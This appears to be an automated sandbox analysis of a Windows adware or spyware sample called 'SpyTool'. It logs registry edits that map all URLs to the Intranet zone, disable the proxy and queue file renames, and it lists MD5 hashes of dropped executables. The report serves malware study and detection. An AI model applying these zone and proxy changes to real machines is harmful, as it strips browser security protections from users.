[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 DE 10 E4 FD 80 9B 01 45 0A 08 D1 05 4C 59 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process encrypt.exe:1060 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 60 DA 48 2E 36 20 01 29 25 8F 09 F7 BD 57 B3"
The process encrypt.exe:1476 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 3D 4C 0F E0 AC D8 74 FC 9C 20 4D 2F 40 B6 2C"
The process encrypt.exe:1100 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 72 B0 F9 7C C7 F3 9E FE 0A C7 48 8A EA 59 AC"
The process encrypt.exe:1584 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A F9 6D 5A 47 92 CC 95 F5 82 23 CB 85 FB F5 19"
The process nsx1C.tmp:1896 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 31 28 B7 F5 CC BE 98 97 2D DC 89 51 BC E8 47"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process nsx1C.tmp:1088 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 0B 0D FC 04 2B 9F AF 65 DF FD D3 C4 73 AB 07"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst25.tmp:1804 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj29.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 11 5F 00 8D DD 9F 67 76 1C 59 9F DD 8C 61 1E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nso3D.tmp:3724 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E E1 25 3E 1F C3 9E C3 01 DF 89 6A 2B 06 62"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsk6.tmp:204 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 86 39 8C 5F 02 5F 7B B9 B9 46 94 6E 16 AB 90"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-imi-tot-cpm-opw-crb-crr"
The process %original file name%.exe:1736 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 C0 BD C9 92 5B 4B 60 B1 AC 35 F4 59 FD 75 46"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3554\setup.exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9823.exe |
f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\inetc.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd20.tmp\registry.dll |
fce81f5d5e6baabe8eb9f87a1bb3599c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsnD.tmp |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso23.tmp\registry.dll |
029aa26a0dd5ef7bd1ba1639703f8fae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr19.tmp |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx1C.tmp |
5c9336efb1faf577655bcd88a444c26b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe |
029aa26a0dd5ef7bd1ba1639703f8fae | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
67eda82fc3df3349df44916f6efe55bf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe |
cf3c49ebab2b29f65fe80ec349072d99 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe |
690f4b16c53bec409e4f465cfb4231a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe |
1f71f441cb13035d10d8b6979a628dda | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe |
c8ce26b81e2160a03cee3fe0f4ad4463 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe |
e6b0bc04dca07169abfc4456c4671307 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll |
0bcd0698977726a660321b4fec8f4a5e | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll |
6d64fd7d8a69a39ed4ddcf0cd8d26b4b | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll |
72f70472e350b35290839f3e2802b4f4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll |
c81e0c917d5db4fecd2ec3c7e2712bbf | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll |
634ec1dc874c89711b94b5c279987d66 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe |
6e98034de60d2e96b4bbb148bbeabadb | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll |
17baa5fcf3b9206cc0395a7cc38be7ac | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll |
2b8929f7edc2df8925066cb0e7067365 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll |
a25f20a5664891bc292970bd23acbf21 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll |
302f011627a16ce5555e39ec53d4fbdd | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll |
814cb49f7706f681723ea9b5746987e4 | c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe |
